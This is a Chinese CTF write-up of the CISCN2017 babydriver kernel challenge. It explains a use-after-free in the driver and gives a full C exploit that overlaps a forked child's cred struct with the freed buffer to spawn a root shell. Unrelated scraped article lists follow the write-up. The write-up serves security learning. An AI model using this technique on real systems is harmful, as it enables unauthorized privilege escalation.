pipixia233333
pipixia233333

第一道 kernel pwn 题 CISCN2017 - babydriver

搞定 环境之后  一切就很简单了起来 (起码做题自闭 总比 环境自闭好多了)

然后 参考链接是 wiki

https://ctf-wiki.github.io/ctf-wiki/pwn/linux/kernel/kernel_uaf-zh/

 

至于 题目 wiki上都给好了 我们直接看驱动吧 这个题目确实是baby

没有任何的防护措施 而且符号表也没有 去掉 在很大程度上 把这个题简单化了

WIKI提供了两种思路  这个是第一种  UAF

看一下题目

第一道 kernel pwn 题 CISCN2017 - babydriver_第1张图片

这里的函数的大概意思 都能够百度的到 如果想具体了解的话  这就需要一些书籍和视频资料了

其实在这里就是很简单的一个程序 创建字符设备  然后 注册函数  注册  模块类型   然后 创建设备

值得注意的点就是这个设备结构体是全局的 也就是说 如果我们创建两次那么  第二次的会把第一次的给覆盖掉

这个就是UAF  

那么  怎么提权  这里有一个结构体

cred

struct cred {
    atomic_t    usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
    atomic_t    subscribers;    /* number of processes subscribed */
    void        *put_addr;
    unsigned    magic;
#define CRED_MAGIC  0x43736564
#define CRED_MAGIC_DEAD 0x44656144
#endif
    kuid_t      uid;        /* real UID of the task */
    kgid_t      gid;        /* real GID of the task */
    kuid_t      suid;       /* saved UID of the task */
    kgid_t      sgid;       /* saved GID of the task */
    kuid_t      euid;       /* effective UID of the task */
    kgid_t      egid;       /* effective GID of the task */
    kuid_t      fsuid;      /* UID for VFS ops */
    kgid_t      fsgid;      /* GID for VFS ops */
    unsigned    securebits; /* SUID-less security management */
    kernel_cap_t    cap_inheritable; /* caps our children can inherit */
    kernel_cap_t    cap_permitted;  /* caps we're permitted */
    kernel_cap_t    cap_effective;  /* caps we can actually use */
    kernel_cap_t    cap_bset;   /* capability bounding set */
    kernel_cap_t    cap_ambient;    /* Ambient capability set */
#ifdef CONFIG_KEYS
    unsigned char   jit_keyring;    /* default keyring to attach requested
                     * keys to */
    struct key __rcu *session_keyring; /* keyring inherited over fork */
    struct key  *process_keyring; /* keyring private to this process */
    struct key  *thread_keyring; /* keyring private to this thread */
    struct key  *request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
    void        *security;  /* subjective LSM security */
#endif
    struct user_struct *user;   /* real user ID subscription */
    struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
    struct group_info *group_info;  /* supplementary groups for euid/fsgid */
    struct rcu_head rcu;        /* RCU deletion hook */
};

其中的改变其中的参数就可以提权 不过 怎么修改呢

在这里 我们可以改变缓冲区的大小

第一道 kernel pwn 题 CISCN2017 - babydriver_第2张图片

其中 可以设定 buf_len的长度大小

但是有一点 需要明白的是,,,

思路是fork  把进程的大部分内容直接给复制到另一个内容

但是怎么确定 fork  也就是子进程的 cred  正好落入“已经被free”的 设备缓冲区呢

那么需要把他的大小给确定了

看源码是一个选项,另一个选项是 自己一个驱动 然后看一下大小

在我上一篇博客上面有一个 细节

那么 确定好之后直接 写代码就ok了

#include 
#include 
#include 
#include 
#include 
#include 
#include 

int main()
{
    // 打开两次设备
    int fd1=open("/dev/babydev",2);
    int fd2=open("/dev/babydev",2);
    // 修改 babydev_struct.device_buf_len 为 sizeof(struct cred)
    ioctl(fd1,0x10001,168);
    // 释放 fd1
    close(fd1);

    // 新起进程的 cred 空间会和刚刚释放的 babydev_struct 重叠
    int pid=fork();
    if(pid<0)
    {
    	puts("[*] fork error!");
    	exit(0);
    }
    else if(pid == 0)
    {
        // 通过更改 fd2,修改新进程的 cred 的 uid,gid 等值为0
        char zeros[30] = {0};
        write(fd2,zeros,28);
        if(getuid()==0)
        {
        	puts("[+] get root!");
            system("/bin/sh");
            exit(0);
        }

	}
    else
    {
        wait(NULL);
    }
    close(fd2);

    return 0;
}

第一道 kernel pwn 题 CISCN2017 - babydriver_第3张图片

 

你可能感兴趣的:(栈溢出,堆溢出)

  • 安恒杯2018-pwn-over Sadmess
    framefaking正如这个技巧名字所说的那样,这个技巧就是构造一个虚假的栈帧来控制程序的执行流。原理概括地讲,我们在之前讲的栈溢出不外乎两种方式控制程序EIP控制程序EBP其最终都是控制程序的执行流。在framefaking中,我们所利用的技巧便是同时控制EBP与EIP,这样我们在控制程序执行流的同时,也改变程序栈帧的位置。一般来说其payload如下bufferpadding|fakeebp
  • 【LeetCode+JavaGuide打卡】Day14|144.二叉树的前序遍历、145.二叉树的后序遍历、94.二叉树的中序遍历 WhoAmI\ leetcode算法职场和发展
    学习目标:144.二叉树的前序遍历145.二叉树的后序遍历94.二叉树的中序遍历学习内容:递归遍历文章讲解确定递归函数的参数和返回值:确定哪些参数是递归的过程中需要处理的,那么就在递归函数里加上这个参数,并且还要明确每次递归的返回值是什么进而确定递归函数的返回类型。确定终止条件:写完了递归算法,运行的时候,经常会遇到栈溢出的错误,就是没写终止条件或者终止条件写的不对,操作系统也是用一个栈的结构来保
  • 父子树形结构(Stream+Lambda) A尘埃 树形结构StreamLambda
    两个类似的需求:返回组装好的部门树、返回组装好的地区信息树,最终都需要返回List集合对象给前端。一般来说完成这样的需求大多数人会想到递归,但递归的方式弊端过于明显:方法多次自调用效率很低、数据量大容易导致堆栈溢出、随着树深度的增加其时间复杂度会呈指数级增加等。一次数据库查询全部数据(几万条),其它全是内存操作、性能高;同时熟练使用stream流操作、Lambda表达式、Java地址引用,完成组装
  • QWB-2018-core | 栈溢出 goodcat666 pwn_cve_kernellinuxpwn
    题目分析core_writesigned__int64__fastcallcore_write(__int64a1,__int64a2,unsigned__int64a3){unsigned__int64v3;//rbxv3=a3;printk(&unk_215);if(v363){printk(&unk_2A1);result=0xFFFFFFFFLL;}else{result=0LL;qmem
  • 嵌入式软件工程师面试题(八) 嵌入式基地 牛客网嵌入式刷题专栏面试嵌入式面试面试题单片机can
    ✅作者简介:大家好我是:嵌入式基地,是一名嵌入式工程师,希望一起努力,一起进步!个人主页:嵌入式基地系列专栏:嵌入式习题专栏微信公众号:嵌入式基地嵌入式软件工程师面试题(八)1、在FreeRTOS中,任务通知的运行机制是怎么样的?2、什么情况下会栈溢出?如何避免?3、深复制和浅复制的区别?4、从一个源文件到可执行文件的过程?5、简述一下快速排序的步骤6、头文件的两种包含方式的区别,与""区别点击查
  • pwn学习笔记(3)ret2syscall 晓幂 学习笔记
    pwn学习笔记(3)ROP原理:ROP(ReturnOrientedProgramming)返回导向编程,主要思想是通过在程序中已有的小片段(gadgets)来改变某些寄存器或者变量的值,从而控制程序的执行流程。栈溢出–ret2syscall:1.系统调用:对于一个已经存在于标准库中的函数,例如printf(),我们编写某个程序的时候,这个函数仅仅只用了printf(参数);这么一行,但是,其工作
  • ndk-stack使用及符号表还原 神迹12
    在android开发中,对于native产生的异常,很可能会产生闪退。对于ndk和native(c、c++)开发中,指针和内存管理是最重要也是最容易出问题的地方,稍有不慎就会遇到诸如内存地址访问错误、野针对、内存泄露、堆栈溢出、初始化错误、类型转换错误、数字除0等常见的问题。AndroidNDK安装包中提供了三个调试工具:addr2line、objdump和ndk-stack可用于native异常
  • 复习leetcode第二百三十一题:2的幂(C语言) 一个不知名程序员www leetcode
    注:本题不是必须使用递归的方法来求解的,同时,2的幂也可以用pow函数来代替;但笔者在此讲解会是在不用pow函数情况下,使用递归的方式本题使用递归时,首先考虑的是如何实现2的幂数,笔者在这边又再题目给的函数基础上,又自定义了一个长整型函数mi(这边的返回类型必须是longint,否则使用递归以后会由于返回值超过int字节大小的范围,出现栈溢出),然后在该函数中实现与pow函数相同功能的函数。lon
  • 代码随想录算法训练营第十四天|二叉树的递归遍历、二叉树的迭代遍历 前端花卷 代码随想录算法训练营算法数据结构javascript
    二叉树的理论基础参考资料(代码随想录)二叉树的递归遍历参考资料(代码随想录)思路递归算法的三个要素:确定递归函数的参数和返回值:确定哪些参数是递归的过程中需要处理的,那么就在递归函数里加上这个参数,并且还要明确每次递归的返回值是什么进而确定递归函数的返回类型。确定终止条件:写完了递归算法,运行的时候,经常会遇到栈溢出的错误,就是没写终止条件或者终止条件写的不对,操作系统也是用一个栈的结构来保存每一
  • vue导航前置守卫 ZOE^V1 vue
    堆栈溢出不知道为什么routers.beforeEach(async(to,from,next)=>{console.log('to',to)console.log('from',from)console.log('next',next)varuserinfo=store.state.user.userinfoconsole.log(userinfo.name)//----------------
  • golang信号处理 realPeanut
    信号是IPC之一,下面是常用的信号列表信号值动作说明SIGHUP1Term终端控制进程结束(终端连接断开)SIGINT2Term用户发送INTR字符(Ctrl+C)触发SIGQUIT3Core用户发送QUIT字符(Ctrl+/)触发SIGILL4Core非法指令(程序错误、试图执行数据段、栈溢出等)SIGABRT6Core调用abort函数触发SIGFPE8Core算术运行错误(浮点运算错误、除数
  • C语言一招教你搞定所有基础函数知识(中) 小陈从不会敲代码 C语言初阶c语言开发语言
    9.函数递归9.1递归的定义递归是什么?递就是递推,回就是回归,递推到结束,回归到开始,说白了就是函数自己调用自己,开始到结束调用,结束到开始调用。#includeintmain(){printf("hehe\n");main();//main函数中⼜调⽤了main函数return0;}这个代码只是为了演示递归的基本形式,不是为了解决问题,最终会栈溢出。9.2如何进行递归递归的时候就是把一个大问题
  • ARM PAC/BTI/MTE三剑客精讲与实战 安全二次方 博客目录导读ARM安全架构PAC指针认证BTI分支目标识别MTE内存标记扩展
    一、PAC指针认证精讲与实战思考1、什么是栈溢出攻击?什么是代码重用攻击?区别与联系?2、栈溢出攻击的软&硬件缓解技术有哪些?在TF-A&OPTEE上的应用?3、什么是ROP攻击?对ROP攻击的缓解技术?4、PAC下的ROP如何缓解?对返回地址的签名与验证?5、PAC的架构细节?硬件原理?PAC如何生成?如何检查?指令集?6、PAC如何启用?构建PAC的编译选项控制?7、PAC功能如何验证?PAC
  • C语言:函数递归 靡樊 c语言学习
    1.递归是什么?先来看最简单的递归代码:#includeintmain(){printf("HelloWorld\n");main();return0;}在main函数里还有一个main函数,在XXX函数里有XXX函数,这种就是递归在函数里调用自己,但这种情况会无限打印HelloWorld,最后导致栈溢出递归的递就是递推的意思,归就是回归的意思,上面的代码则是一直在递,没有归,所以导致栈溢出,所以
  • zer0pts-2020-memo:由文件偏移处理不正确--引发的堆溢出 goodcat666 pwn_cve_kernellinuxpwn
    启动脚本#!/bin/shqemu-system-x86_64\-m256M\-kernel./bzImage\-initrd./rootfs.cpio\-append"root=/dev/ramrwconsole=ttyS0oops=panicpanic=1kaslrquiet"\-cpukvm64,+smep,+smap\-monitor/dev/null\-nographic-enable-
  • “手把手教你玩转函数递归,建议收藏!“ 日月明之月 算法c语言c++开发语言
    目录1.什么是递归2.递归的限制条件3.递归的举例4.递归与迭代正⽂开始1.递归是什么?递归是学习C语⾔函数绕不开的⼀个话题,那什么是递归呢?递归其实是⼀种解决问题的⽅法,在C语⾔中,递归就是函数⾃⼰调⽤⾃⼰。写⼀个史上最简单的C语⾔递归代码:上述就是⼀个简单的递归程序,只不过上⾯的递归只是为了演⽰递归的基本形式,不是为了解决问题,代码最终也会陷⼊死递归(死循环),导致栈溢出。递归的思想:把⼀个⼤
  • C语言----函数递归(自我总结) Phospherus. c语言c++
    一.什么是递归?递归是学习C语⾔函数绕不开的⼀个话题!函数的递归:递归其实是⼀种解决问题的方法。在C语⾔中,递归就是函数自己调用自己。举例:写一个史上最简单函数递归的代码:此代码的运行结果如下:以上代码就是⼀个简单的递归程序,只不过上述代码不是为了解决问题,而是为了演示递归的基本形式,代码陷⼊了递归死循环,最终导致栈溢出(Stackoverflow)。递归的思想:把⼀个⼤型复杂问题层层转化为⼀个与
  • ESXi 勒索病毒ESXiArgs 其 CVE-2021-21974 漏洞分析 Songxwn VMware网络安全服务器
    个人博客https://songxwn.com介绍该漏洞编号为CVE-2021-21974,由OpenSLP服务中的堆溢出问题引起,未经身份验证的攻击者可以此进行低复杂度攻击。该漏洞主要影响6.x版和6.7、7.0版本之前的ESXi管理程序,2021年2月23日,VMware曾发布补丁修复了该漏洞。(在此之后发布的版本不影响)该漏洞启动之后,主要破坏行为为停止所有虚拟机,并加密所有数据文件。具体影
  • JS汉诺塔 AwyaW1217 vue.js前端javascript
    函数直接或间接调用自身避免无限递归,无限递归会导致执行栈溢出对比死循环,不会导致栈溢出执行栈任何代码的执行都必须有一个执行环境,执行环境为代码的执行提供支持执行环境是放到执行栈中的每个函数的调用,都需要创建一个函数的执行环境,函数调用结束,执行环境销毁执行栈有相对谷固定的大小,如果执行环境太多,执行栈无法容纳,栈溢出会报错尾递归如果一个函数最后一条语句是调用函数,并且调用函数不是表达式的一部分,则
  • 寒假作业:2024/2/2 FS223107 javajvm开发语言
    作业1:堆栈的区别栈区:1.栈区是根据栈的思想实现的,先进后出,先申请的变量后分配内存,所以地址是从大地址到小地址2.栈区内存是由计算机自动申请和释放的3.栈区内存一般在几MB4.栈区内存较小,容易造成堆栈溢出:表示内存不足,例如当递归较深时,计算机会一直分配内存,导致栈区内存不足,造成堆栈溢出5.栈区内存申请比较连续堆区:1.堆区是根据队列的思想实现的,先进先出,先申请的变量先分配内存,所以地址
  • CTF比赛 二进制 PWN方入门:基础知识点精讲 徐小潜 学习学习方法经验分享安全网络安全笔记系统安全
    目录二进制基础hack可执行文件小端序两种汇编格式栈溢出基础函数调用栈栈的结构相关寄存器函数调用栈缓冲区溢出PWN工具软件工具Python库Linux系统工具相关值利用PWN步骤以ret2text(32位)为例觉得这篇文章不错的话,欢迎收藏、点赞、评论,期待你的关注!Reverse入门博客推荐:CTF比赛Reverse逆向方向:入门规划精讲-CSDN博客PWN入门学习视频推荐:XMCVECTFPw
  • 20、数据结构相关练习20210202 Dai_yahong 数据结构开发语言
    一、请简述栈区和堆区的区别。1.栈区借助于栈的思想实现,“先进后出”,地址申请从大地址到小地址;堆区借助队列思想实现,“先进先出”,地址申请从小地址到大地址;2.栈区的内存由计算机自动申请自动释放,堆区由程序员手动申请(malloc)手动释放(free);3.栈区大小一般在几M,堆区一般在几G;4.由于栈区较小,可能会出现溢出情况(堆栈溢出),如递归调用较深时,计算机会不断在栈区申请内存。5.栈区
  • C语言函数递归详解 阿阿越 c语言
    递归是什么?递归,顾名思义,就是递推和回归。递归是一种解决问题的方法,在C语言中,递归就是函数自己调用自己。#includeintmain(){printf("hehe\n");main();//main函数中⼜调⽤了main函数return0;}上面就是C语言最简单的递归代码。但是这种代码最终会陷入死递归,导致栈溢出(Stackoverflow)。递归的核心是思想和限制条件:1、思想:把一个大型
  • C语言:函数递归详解 弓.长. c语言开发语言
    文章目录一、基础概念1.函数递归的概念2.递归函数的定义3.函数递归的优缺点4.函数递归的两个必要条件二、函数递归实例入门(1).最简单的函数递归1.1栈溢出的原因(2).顺序打印整数的每一位三、函数递归举例举例1:求n的阶乘举例2:递归实现n的k次方举例3:计算一个数的每位之和(递归实现)举例4:斐波那契数(递归实现和非递归实现)(1).递归的实现(2).非递归的实现一、基础概念1.函数递归的概
  • 解决C#中无限递归导致的System.StackOverflowException异常 空白_d java算法开发语言笔记c#
    目录背景:错误示例分析:为什么是错误的?正确的使用递归:修改后的代码:原理和原因:结论:背景:在软件开发中,递归是一种常见的编程技术,它允许方法调用自身来解决问题。然而,如果不正确使用,递归可能导致严重的性能问题或运行时错误,如栈溢出。本文将通过分析一个具体的错误示例——一个无限递归调用自身的情况,来探讨递归的正确使用方法及其背后的原理。错误示例分析:考虑下面的C#代码段,这是一个简化的新闻管理系
  • 2.2作业 Yukiii_Y 算法数据结构
    1.堆区和栈区的区别堆区基于队列的思想,先定义的变量先申请内存,大小在几G,属于静态分配需要手动申请手动释放,从小地址到大地址,容易出现片段化栈借助栈的思想,先定义的变量,后分配内存,动态自动申请自动释放,大小在几M,会发生堆栈溢出,内存连续2.#include#include#includetypedefstructlist{intdata;structlist*next;}*Linklist;
  • java.lang.StackoverflowError: null .小白菜. javajvm开发语言
    首先,这个问题呢是栈溢出导致的,一般出现原因大多都是因为,无限递归死循环导致的前言:在JVM当中,每个线程都有自己的程序计数器,虚拟机栈和本地方法栈,这个栈溢出是指的是虚拟机栈溢出。再说这个栈溢出的时候,先来看一下我们虚拟机栈的结构一次次的Java方法调用就代表着一个栈帧,秉承着先进后出的原则,每次调用会将栈帧入栈,指令执行完成后进行出栈,然后按照程序的指令不停的入栈出栈,直到程序结束,但是死循环
  • 查询报错:java.lang.StackOverflowError: null PI_PIBOY Hibernate
    java.lang.StackOverflowError:null字面理解报错的原因是栈溢出。我这里仅讲由于使用JPA导致的java.lang.StackOverflowError:null例子:清洁工实体@Data@Entity@Table(name="cms_cleaner")publicclassCleanerimplementsSerializable{@ManyToMany(fetch=
  • JPA执行查询报错java.lang.StackOverflowError: null问题排查与解决 MaYuKang 线上问题排查javahibernateJPAJoinProcessordoFindAllNodes
    生产环境执行定时任务时报错java.lang.StackOverflowError:null开发和测试环境运行正常,报错方法为Jpa类库里JoinProcessor.doFindAllNodes方法,该方法用于拼接查询参数,如(?,?,?,?),由于是通过迭代进行拼接,通过jpa提供的findByIdIn方法,传入的id集合,所以当拼接参数过长时,会发生栈溢出异常。可以通过分段查询的方式和更改jv
  • java.lang.StackOverflowError: null(栈内存溢出) 贤云Ye鹤 java开发中遇到的问题javajvmservlet
    StackOverflowError在程序栈空间耗尽时抛出,通常是深度递归导致,出现栈内存溢出,查询了网上的资料,一般来说出现栈溢出的情况有:service层忘了加@Service注解service层忘了加@Autowired注解多个实体类有多对多(多对一)关系时,两个有对应关系的实体类都重写相关联属性字段的toString方法,这样会导致一直递归重写下去,内存当然会被耗尽,导致栈溢出Thymel
  • PHP如何实现二维数组排序? IT独行者 二维数组PHP排序 
    二维数组在PHP开发中经常遇到,但是他的排序就不如一维数组那样用内置函数来的方便了,(一维数组排序可以参考本站另一篇文章【PHP中数组排序函数详解汇总】)。二维数组的排序需要我们自己写函数处理了,这里UncleToo给大家分享一个PHP二维数组排序的函数: 代码: functionarray_sort($arr,$keys,$type='asc'){ $keysvalue= $new_arr
  • 【Hadoop十七】HDFS HA配置 bit1129 hadoop
    基于Zookeeper的HDFS HA配置主要涉及两个文件,core-site和hdfs-site.xml。   测试环境有三台 hadoop.master hadoop.slave1 hadoop.slave2   hadoop.master包含的组件NameNode, JournalNode, Zookeeper,DFSZKFailoverController
  • 由wsdl生成的java vo类不适合做普通java vo darrenzhu VOwsdlwebservicerpc
    开发java webservice项目时,如果我们通过SOAP协议来输入输出,我们会利用工具从wsdl文件生成webservice的client端类,但是这里面生成的java data model类却不适合做为项目中的普通java vo类来使用,当然有一中情况例外,如果这个自动生成的类里面的properties都是基本数据类型,就没问题,但是如果有集合类,就不行。原因如下: 1)使用了集合如Li
  • JAVA海量数据处理之二(BitMap) 周凡杨 java算法bitmapbitset数据
           路漫漫其修远兮,吾将上下而求索。想要更快,就要深入挖掘 JAVA 基础的数据结构,从来分析出所编写的 JAVA 代码为什么把内存耗尽,思考有什么办法可以节省内存呢? 啊哈!算法。这里采用了 BitMap 思想。   首先来看一个实验: 指定 VM 参数大小: -Xms256m -Xmx540m
  • java类型与数据库类型 g21121 java
    很多时候我们用hibernate的时候往往并不是十分关心数据库类型和java类型的对应关心,因为大多数hbm文件是自动生成的,但有些时候诸如:数据库设计、没有生成工具、使用原始JDBC、使用mybatis(ibatIS)等等情况,就会手动的去对应数据库与java的数据类型关心,当然比较简单的数据类型即使配置错了也会很快发现问题,但有些数据类型却并不是十分常见,这就给程序员带来了很多麻烦。 &nb
  • Linux命令 510888780 linux命令
    系统信息 arch 显示机器的处理器架构(1) uname -m 显示机器的处理器架构(2) uname -r 显示正在使用的内核版本 dmidecode -q 显示硬件系统部件 - (SMBIOS / DMI) hdparm -i /dev/hda 罗列一个磁盘的架构特性 hdparm -tT /dev/sda 在磁盘上执行测试性读取操作 cat /proc/cpuinfo 显示C
  • java常用JVM参数 墙头上一根草 javajvm参数
    -Xms:初始堆大小,默认为物理内存的1/64(<1GB);默认(MinHeapFreeRatio参数可以调整)空余堆内存小于40%时,JVM就会增大堆直到-Xmx的最大限制 -Xmx:最大堆大小,默认(MaxHeapFreeRatio参数可以调整)空余堆内存大于70%时,JVM会减少堆直到 -Xms的最小限制 -Xmn:新生代的内存空间大小,注意:此处的大小是(eden+ 2
  • 我的spring学习笔记9-Spring使用工厂方法实例化Bean的注意点 aijuans Spring 3
    方法一: <bean id="musicBox" class="onlyfun.caterpillar.factory.MusicBoxFactory" factory-method="createMusicBoxStatic"></bean> 方法二:
  • mysql查询性能优化之二 annan211 UNIONmysql查询优化索引优化
    1 union的限制 有时mysql无法将限制条件从外层下推到内层,这使得原本能够限制部分返回结果的条件无法应用到内层 查询的优化上。 如果希望union的各个子句能够根据limit只取部分结果集,或者希望能够先排好序在 合并结果集的话,就需要在union的各个子句中分别使用这些子句。 例如 想将两个子查询结果联合起来,然后再取前20条记录,那么mys
  • 数据的备份与恢复 百合不是茶 oraclesql数据恢复数据备份
     数据的备份与恢复的方式有: 表,方案 ,数据库;     数据的备份: 导出到的常见命令; 参数 说明 USERID 确定执行导出实用程序的用户名和口令 BUFFER 确定导出数据时所使用的缓冲区大小,其大小用字节表示 FILE 指定导出的二进制文
  • 线程组 bijian1013 java多线程threadjava多线程线程组
    有些程序包含了相当数量的线程。这时,如果按照线程的功能将他们分成不同的类别将很有用。        线程组可以用来同时对一组线程进行操作。        创建线程组:ThreadGroup g = new ThreadGroup(groupName);  &nbs
  • top命令找到占用CPU最高的java线程 bijian1013 javalinuxtop
    上次分析系统中占用CPU高的问题,得到一些使用Java自身调试工具的经验,与大家分享。 (1)使用top命令找出占用cpu最高的JAVA进程PID:28174 (2)如下命令找出占用cpu最高的线程 top -Hp 28174 -d 1 -n 1 32694 root 20 0 3249m 2.0g 11m S 2 6.4 3:31.12 java
  • 【持久化框架MyBatis3四】MyBatis3一对一关联查询 bit1129 Mybatis3
      当两个实体具有1对1的对应关系时,可以使用One-To-One的进行映射关联查询   One-To-One示例数据 以学生表Student和地址信息表为例,每个学生都有都有1个唯一的地址(现实中,这种对应关系是不合适的,因为人和地址是多对一的关系),这里只是演示目的   学生表   CREATE TABLE STUDENTS (
  • C/C++图片或文件的读写 bitcarter 写图片
    先看代码: /*strTmpResult是文件或图片字符串 * filePath文件需要写入的地址或路径 */ int writeFile(std::string &strTmpResult,std::string &filePath) { int i,len = strTmpResult.length(); unsigned cha
  • nginx自定义指定加载配置 ronin47
    进入 /usr/local/nginx/conf/include 目录,创建 nginx.node.conf 文件,在里面输入如下代码: upstream nodejs { server 127.0.0.1:3000; #server 127.0.0.1:3001; keepalive 64; } server { liste
  • java-71-数值的整数次方.实现函数double Power(double base, int exponent),求base的exponent次方 bylijinnan double
    public class Power { /** *Q71-数值的整数次方 *实现函数double Power(double base, int exponent),求base的exponent次方。不需要考虑溢出。 */ private static boolean InvalidInput=false; public static void main(
  • Android四大组件的理解 Cb123456 android四大组件的理解
     分享一下,今天在Android开发文档-开发者指南中看到的:                            App components are the essential building blocks of an Android
  • [宇宙与计算]涡旋场计算与拓扑分析 comsci 计算
         怎么阐述我这个理论呢? 。。。。。。。。。       首先: 宇宙是一个非线性的拓扑结构与涡旋轨道时空的统一体。。。。       我们要在宇宙中寻找到一个适合人类居住的行星,时间非常重要,早一个刻度和晚一个刻度,这颗行星的
  • 同一个Tomcat不同Web应用之间共享会话Session cwqcwqmax9 session
    实现两个WEB之间通过session 共享数据 查看tomcat 关于 HTTP Connector 中有个emptySessionPath 其解释如下: If set to true, all paths for session cookies will be set to /. This can be useful for portlet specification impleme
  • springmvc Spring3 MVC,ajax,乱码 dashuaifu springjquerymvcAjax
      springmvc Spring3 MVC @ResponseBody返回,jquery ajax调用中文乱码问题解决   Spring3.0 MVC @ResponseBody 的作用是把返回值直接写到HTTP response body里。具体实现AnnotationMethodHandlerAdapter类handleResponseBody方法,具体实
  • 搭建WAMP环境 dcj3sjt126com wamp
    这里先解释一下WAMP是什么意思。W:windows,A:Apache,M:MYSQL,P:PHP。也就是说本文说明的是在windows系统下搭建以apache做服务器、MYSQL为数据库的PHP开发环境。      工欲善其事,必须先利其器。因为笔者的系统是WinXP,所以下文指的系统均为此系统。笔者所使用的Apache版本为apache_2.2.11-
  • yii2 使用raw http request dcj3sjt126com http
    Parses a raw HTTP request using yii\helpers\Json::decode()   To enable parsing for JSON requests you can configure yii\web\Request::$parsers using this class: 'request' =&g
  • Quartz-1.8.6 理论部分 eksliang quartz
    转载请出自出处:http://eksliang.iteye.com/blog/2207691 一.概述 基于Quartz-1.8.6进行学习,因为Quartz2.0以后的API发生的非常大的变化,统一采用了build模式进行构建; 什么是quartz?   答:简单的说他是一个开源的java作业调度框架,为在 Java 应用程序中进行作业调度提供了简单却强大的机制。并且还能和Sp
  • 什么是POJO? gupeng_ie javaPOJO框架Hibernate
    POJO--Plain Old Java Objects(简单的java对象)   POJO是一个简单的、正规Java对象,它不包含业务逻辑处理或持久化逻辑等,也不是JavaBean、EntityBean等,不具有任何特殊角色和不继承或不实现任何其它Java框架的类或接口。   POJO对象有时也被称为Data对象,大量应用于表现现实中的对象。如果项目中使用了Hiber
  • jQuery网站顶部定时折叠广告 ini JavaScripthtmljqueryWebcss
    效果体验:http://hovertree.com/texiao/jquery/4.htmHTML文件代码: <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>网页顶部定时收起广告jQuery特效 - HoverTree<
  • Spring boot内嵌的tomcat启动失败 kane_xie spring boot
    根据这篇guide创建了一个简单的spring boot应用,能运行且成功的访问。但移植到现有项目(基于hbase)中的时候,却报出以下错误:     SEVERE: A child container failed during start java.util.concurrent.ExecutionException: org.apache.catalina.Lif
  • leetcode: sort list michelle_0916 Algorithmlinked listsort
    Sort a linked list in O(n log n) time using constant space complexity. ====analysis======= mergeSort for singly-linked list  ====code=======   /** * Definition for sin
  • nginx的安装与配置,中途遇到问题的解决 qifeifei nginx
    我使用的是ubuntu13.04系统,在安装nginx的时候遇到如下几个问题,然后找思路解决的,nginx 的下载与安装   wget http://nginx.org/download/nginx-1.0.11.tar.gz tar zxvf nginx-1.0.11.tar.gz ./configure make make install   安装的时候出现
  • 用枚举来处理java自定义异常 tcrct javaenumexception
    在系统开发过程中,总少不免要自己处理一些异常信息,然后将异常信息变成友好的提示返回到客户端的这样一个过程,之前都是new一个自定义的异常,当然这个所谓的自定义异常也是继承RuntimeException的,但这样往往会造成异常信息说明不一致的情况,所以就想到了用枚举来解决的办法。 1,先创建一个接口,里面有两个方法,一个是getCode, 一个是getMessage public
  • erlang supervisor分析 wudixiaotie erlang
    当我们给supervisor指定需要创建的子进程的时候,会指定M,F,A,如果是simple_one_for_one的策略的话,启动子进程的方式是supervisor:start_child(SupName, OtherArgs),这种方式可以根据调用者的需求传不同的参数给需要启动的子进程的方法。和最初的参数合并成一个数组,A ++ OtherArgs。那么这个时候就有个问题了,既然参数不一致,那
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他